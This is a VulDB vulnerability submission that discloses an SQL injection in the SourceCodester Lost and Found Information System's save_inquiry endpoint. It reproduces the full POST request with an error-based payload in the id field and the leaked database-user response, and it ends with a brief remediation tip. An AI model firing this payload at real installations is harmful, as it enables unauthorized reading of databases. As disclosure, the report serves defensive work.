Submit #182669: SourceCodester Lost and Found Information System sql injectioninfo

TitelSourceCodester Lost and Found Information System sql injection
BeschreibungI find a SQL injection vulnerability in the SourceCodester Lost and Found Information System(https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html) This affect the file /classes/Master.php?f=save_inquiry: POST /php-lfis/classes/Master.php?f=save_inquiry HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------291530209222137902962820473916 Content-Length: 1093 Origin: http://localhost Connection: close Referer: http://localhost/php-lfis/admin/?page=items/manage_item Cookie: PHPSESSID=0mct2fkncfd5or5crbqj5o62he Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------291530209222137902962820473916 Content-Disposition: form-data; name="id" 1' or (extractvalue(1,concat(0x7e,(select user()),0x7e)))# -----------------------------291530209222137902962820473916 Content-Disposition: form-data; name="category_id" 2 -----------------------------291530209222137902962820473916 Content-Disposition: form-data; name="fullname" 1111 -----------------------------291530209222137902962820473916 Content-Disposition: form-data; name="title" 111 -----------------------------291530209222137902962820473916 Content-Disposition: form-data; name="contact" 111 -----------------------------291530209222137902962820473916 Content-Disposition: form-data; name="description" 1111 -----------------------------291530209222137902962820473916 Content-Disposition: form-data; name="image"; filename="" Content-Type: application/octet-stream -----------------------------291530209222137902962820473916 Content-Disposition: form-data; name="status" 0 -----------------------------291530209222137902962820473916-- And it returns "{"status":"failed","err":"XPATH syntax error: '~admin@localhost~'[UPDATE `inquiry_list` set `category_id`='2' , `fullname`='1111' , `title`='111' , `contact`='111' , `description`='1111' , `status`='0' where id = '1' or (extractvalue(1,concat(0x7e,(select user()),0x7e)))#' ]"}". The appearance of '~ admin@localhost ~' proves that our code select user() was successfully executed, and there is an SQL error injection vulnerability here The vulnerability arises from the usage of the code "UPDATE `inquiry_list` set {data} where id = '{id}' ;" without implementing sufficient filtering on the controllable parameter id. This lack of proper filtering exposes the potential for SQL injection attacks. To address this issue, my recommendation is to protect the id parameter against malicious exploitation by utilizing mysqli_real_escape_string().
Quelle⚠️ https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html
Benutzer
 Tritium (UID 50779)
Einreichung14.07.2023 12:39 (vor 3 Jahren)
Moderieren15.07.2023 09:33 (21 hours later)
StatusAkzeptiert
VulDB Eintrag234224 [SourceCodester Lost and Found Information System 1.0 HTTP POST Request Master.php?f=save_inquiry ID SQL Injection]
Punkte20

ZurückÜbersichtWeiter

Might our Artificial Intelligence support you?

Check our Alexa App!